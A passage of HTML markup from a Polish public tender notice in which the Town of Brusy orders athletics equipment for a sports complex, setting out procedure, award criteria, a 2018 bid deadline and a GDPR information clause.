style='border: 1px solid black;border-collapse: collapse;'>37415000-0</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach">30</span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"></span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1)	Wypełniony formularz oferty - zgodny z wzorem stanowiącym Załącznik Nr 1 do SIWZ; 2)	Pełnomocnictwo dla osoby podpisującej ofertę do występowania w imieniu Wykonawcy, w przypadku, o którym mowa w art. 23 ust. 2 ustawy Prawo zamówień publicznych (propozycja - Załącznik Nr 5 do SIWZ). 3) Wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, przekazuje Zamawiającemu oświadczenie o przynależności albo braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Prawo zamówień publicznych. Propozycja treści oświadczenia stanowi Załącznik nr 4 do SIWZ. W przypadku przynależności do tej samej grupy kapitałowej Wykonawca może złożyć wraz z oświadczeniem dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Termin wykonania zamówienia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1.	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności.2.	Istotne zmiany w umowie, na skutek wystąpienia poniższych okoliczności mogą dotyczyć następujących elementów umowy:?	wysokości wynagrodzenia w przypadku stwierdzenia braku konieczności wykonywania części zamówienia;?	terminu realizacji umowy, jeżeli wystąpią czynniki niezależne od Wykonawcy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-08-09</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17"></span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5"></span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej ,,RODO", informuję, że: ?	administratorem Pani/Pana danych osobowych jest Burmistrz Brus, ul. Na Zaborach 1, 89-632 Brusy;?	inspektorem ochrony danych osobowych u Administratora jest Magdalena Zarębska, z którą można kontaktować się e-mailem: iod@brusy.pl; pod numerem telefonu 52-39-69-300 lub pisemnie na adres: Urząd Miejski w Brusach, ul. Na Zaborach 1, 89-632 Brusy;?	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na ,,Dostawę sprzętu dla wyposażenia kompleksu boisk sportowych w Brusach" prowadzonym w trybie przetargu nieograniczonego;?	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2017 r. poz. 1579 z późn zm.), dalej ,,ustawa Pzp"; ?	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;?	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; ?	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;?	posiada Pani/Pan:-	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;-	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowaniao udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);-	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego); -	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;?	nie przysługuje Pani/Panu:-	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;-	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;-	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Zadanie pn. ,,Modernizacja boiska treningowego kompleksu sportowego przy ul. Armii Krajowej w Brusach wraz z zagospodarowaniem terenu oraz zakupem niezbędnego sprzętu" dofinansowane w ramach Pilotażowego programu modernizacji infrastruktury sportowej - Mały Klub 2017</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Przedmiotem zamówienia jest dostawa sprzętu dla wyposażenia kompleksu boisk sportowych w Brusach:Część I: zadanie pn. ,,Modernizacja boiska treningowego kompleksu sportowego przy ul. Armii Krajowej w Brusach wraz z zagospodarowaniem terenu oraz zakupem niezbędnego sprzętu" dofinansowane w ramach Pilotażowego programu modernizacji infrastruktury sportowej - Mały Klub 2017.2.	Zamawiający zleca Wykonawcy, a Wykonawca zobowiązuje się:1)	sprzedać oraz dostarczyć i zamontować (jeśli sposób użytkowania wymaga montażu):Część I:Lp.	Rodzaj sprzętu	Ilośćszt. / kpl	Wymagania i opis1. Blok startowy	6	Certyfikat IAAF, konstrukcja z aluminium lub ze stali cynkowanej galwanicznie, zakres pochylenia oparć (5 poz.) i wzajemnego ich położenia (15 poz.).2. Płotek	65	Certyfikat IAAF, minimum sześć wysokości, w tym m.in. 680, 762, 838, zatrzaskowy systemem regulacji wysokości i zatrzaskowy system regulacji siły przewrotu płotka, plastikowa listwa.3. Pałeczki sztafetowe	10	